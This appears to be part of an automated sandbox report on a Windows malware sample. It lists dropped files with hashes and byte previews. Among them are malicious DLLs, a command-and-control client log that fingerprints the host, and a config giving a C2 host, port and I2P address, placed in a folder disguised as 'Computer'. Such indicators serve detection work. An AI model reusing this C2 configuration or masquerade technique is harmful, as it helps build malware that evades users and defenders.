                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.6.4.<./.P.i.
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4603
                                                    Entropy (8bit):4.414685630451273
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zs3Jg771I9x+WpW8VYXYm8M4JD2+AFO9BPyq85/3u4p3YiSd:uIjfZI72/7VHJlBP/Y3YiSd
                                                    MD5:B871D38362A6028B397BDC0260070BE0
                                                    SHA1:9FA60FB0919A607D809503279999C48143906741
                                                    SHA-256:7EA7EA0CA3F36570D708DA64C0D8DF293184B087AE64C7319A8C27F108837A7C
                                                    SHA-512:65133C3D1F52024510B7957223BA24174B1BC5536FD07CE313ACB5D2F0F43EF42784BB8E1CEB75885F59A5192EC61193C2A4CDCF56BC19FF99A4A4A1A9078A1D
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540574" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):81434
                                                    Entropy (8bit):3.0826592663433368
                                                    Encrypted:false
                                                    SSDEEP:1536:BhMrJCG3mWqBfN11MnxdVFHupcYkV2aSzrOPjUHL3/C2bkvRH1Axs019ry/3:BhMrJCG3mWqBfN11MnxdVFHupcYkV2aZ
                                                    MD5:176DCE244DDCBF45DA0117CADA3080EB
                                                    SHA1:CD1D82C3E3807F9EC588D9F176461696773E0CC6
                                                    SHA-256:5CD2B51D1CF9B62F9744DAD635FD9F69FD5CF4F2793610E0BFC8FFE539C397DC
                                                    SHA-512:DB5765571D330D75BBDD5D015DC5C53C4ED2C6FE0D0159B24F0B69EB895B624E5EB5984C01456BE45691D9DD0E3A9390234DC55281E46A4720DBF08B79E13C95
                                                    Malicious:false
                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):13340
                                                    Entropy (8bit):2.6852273436228047
                                                    Encrypted:false
                                                    SSDEEP:96:TiZYW7UP1uoCtY9OYIWFHSIYEZGFtriA+Fldw2DWhvLawolMPxBIWb3:2ZDtyOHw+LawolMPx+Wb3
                                                    MD5:98BCC3A5D49EEC8F131185A547106F27
                                                    SHA1:3E7BE150E7BB72692B97F9387C9D89C085178D67
                                                    SHA-256:EC9E9CF6F7D1501D10B3875552973FF9D2DF4282CDE9089FC526155C37672206
                                                    SHA-512:EBFC9CC0B57F1AD2F80A43732746DDBC7B78C642C5BC4E3BB871936B0C3D2179E2C4A83CD548A531819D074FC0ABA36E06726052CAD25A72AE7114B230BBC010
                                                    Malicious:false
                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Sat Oct 12 18:31:11 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):633690
                                                    Entropy (8bit):1.0048104466051435
                                                    Encrypted:false
                                                    SSDEEP:768:lDdwUH1zbXvmalsFCKM/b1X9LSsclyBNA112r3G6avKzs4Js/8cleRJK0pjdIB:ldRui/b1X9LPclyBNA112r2+s/8GvB
                                                    MD5:3A96551F489DC9682F594BC3E237E9C5
                                                    SHA1:CE323D70FC8F74C821CF673F49EF322AEC3D790A
                                                    SHA-256:993128EC62686FDCD123B71B422410A121B393151F17D82EEA01073055904575
                                                    SHA-512:0F7090C182F268805CDB4B515B9EF90CC9B3C8C3078C3CB208D52DD868277798670DED6D066CE39AD0A462BEF9F41E6DFD9FEE7A22ECBEB15583D1650F956EE1
                                                    Malicious:false
                                                    Preview:MDMP..a..... .......o..g............$...........(...8...........` ..........h...........`.......8...........T................|..........\!..........H#..............................................................................eJ.......#......Lw......................T...........:..g.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6730
                                                    Entropy (8bit):3.7196194230656645
                                                    Encrypted:false
                                                    SSDEEP:96:RSIU6o7wVetbCacqQvYHV4GZi5aM4UB89bXRDf4fhb9m:R6l7wVeJCp3vYHsprB89bXR8fhb9m
                                                    MD5:439E78AF878FCE76932B930A7CB99750
                                                    SHA1:3A6972DFBDFD816634554DDAA637742F83E565D2
                                                    SHA-256:1634B597E0A5F7981D0A9745970D45EF09D3CCB14562E7195961618747E590B6
                                                    SHA-512:C9709A566A35C7D6CA4522525CCC1CBE617FD31BFA2814E70C70D45AF8EAE5E375A017F3E34F5FFB4C4863FD7D3C06C90419F89097D04B821E2E84C492DFB21D
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.2.<./.P.i.
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4603
                                                    Entropy (8bit):4.415003392147944
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsorJg771I9x+WpW8VYkYm8M4JD2+AFDQjyq85/3o4p3YiJd:uIjfoFI72/7VIJuQjtY3YiJd
                                                    MD5:EAFA85883D8F618C8C77BB4404D69C3A
                                                    SHA1:4BFD08E1482D9D8416217FB0B5689AC1C5A9BCD6
                                                    SHA-256:47A6FF492637CEF5EFA8B6AF99E71FFEA0467A29366386A8B5F951F90CAA2599
                                                    SHA-512:64C0A830C4BE02F3ED0E66AFA2803430A69980D1D1505E7F894EFB1CB57AF4EE8372B92FEFAF517CCECFA8A5EFE4A44EDBDAEB0CDABE1E889A480E0B03D06E6B
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540573" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):83546
                                                    Entropy (8bit):3.079738367223419
                                                    Encrypted:false
                                                    SSDEEP:1536:yABoNiKmhy9/uM32aSB1FHupcYkV2aSzrOPjUHL3/C2bkvRH1Axs02036APt:yABoNiKmhy9/uM32aSB1FHupcYkV2aSR
                                                    MD5:54244C00267E84307BD3D46C41C54225
                                                    SHA1:406EAAF9625DF680D18BEAD64AC78D3678A2DD5E
                                                    SHA-256:7A5CD5E701427394A5FD3CCCE0ED6E9568565438B4B99D661078A4F58D2ED803
                                                    SHA-512:B3BDF8BE0E093BAF9392D7D43289AF7ABDD1891D5CB6789DBF20E7B241A5A7696FBD940B572F4AD9B04421EFFC3A55BD33E37F055AF44D534AD2E65711ADC204
                                                    Malicious:false
                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):13340
                                                    Entropy (8bit):2.6853066287897627
                                                    Encrypted:false
                                                    SSDEEP:96:TiZYWXPFYrM6tNYCOYZWqvHSPYEZvctrikMflzwsUSPlatohMjxoaIEgb3:2ZD2nfNObYSNatohMjxoNEgb3
                                                    MD5:8BF8263C0B6B1A0796EED7AAC4302B23
                                                    SHA1:B7E582E0AAD4FB22047977F9C6213D0CB773DCDC
                                                    SHA-256:4C0E34F9297C5F177518F7EA40E27C4A369172C7509BF8CC6DE9FC6A167C1B37
                                                    SHA-512:6D3C24705D56E7CBFBC0552DED7B3C6215CADF6432E41CC1D2B9DD334C75D5CC4AD7A1137E39BDB6593BA40001E0459E949FABA0736656538FFB41C86D365F9D
                                                    Malicious:false
                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                    Process:C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):456
                                                    Entropy (8bit):3.2341395630162877
                                                    Encrypted:false
                                                    SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                                                    MD5:40AB00517F4227F2C3C334F1D16B65B4
                                                    SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                                                    SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                                                    SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                                                    Malicious:false
                                                    Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):115200
                                                    Entropy (8bit):6.220212606349767
                                                    Encrypted:false
                                                    SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
                                                    MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
                                                    SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
                                                    SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
                                                    SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):2847
                                                    Entropy (8bit):5.56450663056498
                                                    Encrypted:false
                                                    SSDEEP:48:CFdHW54yclDEDsXcm9FL4gU4bcPPu4bcPPTM94bcPPZ4bcPPA4bcPPL4bcPPcWIk:idH9NBJ9VT3YPpYPTNYP6YPTYPcYPVio
                                                    MD5:247FAA2BC39CD77BE6DF201B9CF6CB0D
                                                    SHA1:CCC66A863CF73E3737E5422F183ACAD3754A6717
                                                    SHA-256:E56222C49E13BA0C717FAD3CFE126DD8EA59524E6A6C1486B688F47752FAF9B2
                                                    SHA-512:2ECD9E8BCB073A0C848045147CC9AAE3B3950B723A42171F412317DEC842266AB612C20AA2D4C46CA853150AEE1BAE08962EE1D6D9C4B5708BA3638CCA78A2CD
                                                    Malicious:false
                                                    Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=c
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:Generic INItialization configuration [cnccli]
                                                    Category:dropped
                                                    Size (bytes):214
                                                    Entropy (8bit):5.0997449470012635
                                                    Encrypted:false
                                                    SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
                                                    MD5:26702FAAB91B6B144715714A96728F39
                                                    SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
                                                    SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
                                                    SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
                                                    Malicious:false
                                                    Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):104448
                                                    Entropy (8bit):6.259370376612282
                                                    Encrypted:false
                                                    SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
                                                    MD5:7A8E8A0842D8D65713DEE5393E806755
                                                    SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
                                                    SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
                                                    SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                                    Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1021
                                                    Entropy (8bit):5.447868717380615
                                                    Encrypted:false
                                                    SSDEEP:24:CFAGHS+5lGyclY7GfylD2BlD7cRE9FLxJsJ4b0ER+SXY0e:CFdHS+54yclDEDsXcm9FL4gpi
                                                    MD5:18E6EDE868C38BD1A4854E37F6C3F9D1
                                                    SHA1:DA50AAC964319AC42FC45D72D2604C9A356784D9
                                                    SHA-256:3A6C102A8EB7961CB3839E3F4D25AB965D532F47F48DA1D55CBAA97B632E9E00
                                                    SHA-512:A9FD0A27301D2C5BB7A8877D87FCF5F2CE104756F79C0F09E9F0259FD4872194E4F8D7DEF36C79608FE1DAA26F9683A9A99368C794402A67E3D6FADDDFB862E5
                                                    Malicious:false
